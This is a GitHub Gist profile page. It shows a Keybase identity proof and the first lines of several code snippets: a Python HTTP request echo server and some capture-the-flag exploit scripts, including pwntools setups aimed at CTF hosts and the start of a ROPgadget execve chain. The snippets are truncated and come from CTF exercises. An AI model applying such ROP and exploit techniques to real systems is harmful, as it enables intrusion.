Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am aagallag on github.
  • I am aagallag (https://keybase.io/aagallag) on keybase.
  • I have a public key ASAEe_jXbL3BMkEMOrv4nK8vhsndVR0AwOpN88OOvFwQwAo

To claim this, I am signing this object:

@aagallag
aagallag / reflect.py
Last active July 12, 2016 05:33 — forked from huyng/reflect.py
A simple echo server to inspect http web requests
#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)
# Modifications by Aaron Gallagher (2016)
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
import datetime
LOG_FILE = 'log_%s.txt' % datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
#!/usr/bin/env python2
def try_numb_part1(last2):
ecx = 0x1
while last2 > 0:
last2 = last2 - ecx
ecx += 2
if last2 != 0:
return False
#!/usr/bin/env python2
import base64
from pwn import *
HOST='megan35.stillhackinganyway.nl'
PORT='3535'
REMOTE=True
DEBUG=False
FNAME='./megan-35'
@aagallag
aagallag / babys_first_rop_pwner.py
Created August 12, 2018 10:30
Writeup for Baby's First ROP (OpenCTF)
#!/usr/bin/env python2
from pwn import *
REMOTE = True
DBG = False
FNAME = './cracked_chall_binary'
HOST = '172.31.2.62'
PORT = '47802'
GADGETS_BASE = 0x601080
#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
def getropchain():
# Padding goes here
p = ''
p += p32(0x0806fa7a) # pop edx ; ret